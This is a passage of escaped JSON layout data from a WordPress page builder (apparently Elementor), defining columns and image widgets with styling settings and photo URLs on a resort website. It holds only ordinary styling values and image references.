\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9318e77\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c458907\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ce9fbab\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ec695bc\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"891ac80\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3598.jpg\",\"id\":493},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ba07af4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"eae_slider_custom_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"eae_slider_custom_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_custom_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"eae_slider_delay\":\"5000\",\"gradient_background_angle\":{\"unit\":\"deg\",\"size\":-45,\"sizes\":[]},\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b38d892\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d2534d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"129c6ce\"}],\"background_overlay_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"background_overlay_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"background_overlay_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"background_overlay_hover_opacity\":{\"unit\":\"px\",\"size\":0.5,\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_overlay_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]},\"border_hover_transition\":{\"unit\":\"px\",\"size\":0.3,\"sizes\":[]}},\"elements\":[{\"id\":\"260f883\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3565.jpg\",\"id\":490},\"width\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"space_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"opacity\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"opacity_hover\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"css_filters_hover_blur\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"css_filters_hover_brightness\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_contrast\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_saturate\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]},\"css_filters_hover_hue\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"caption_space_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_color_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"_background_hover_color_b_stop\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_gradient_angle\":{\"unit\":\"deg\",\"size\":180,\"sizes\":[]},\"_background_hover_xpos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_xpos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_tablet\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_ypos_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_hover_bg_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_hover_bg_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_bg_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_background_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_border_hover_transition\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_element_custom_width_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x\":{\"unit\":\"px\",\"size\":\"0\",\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\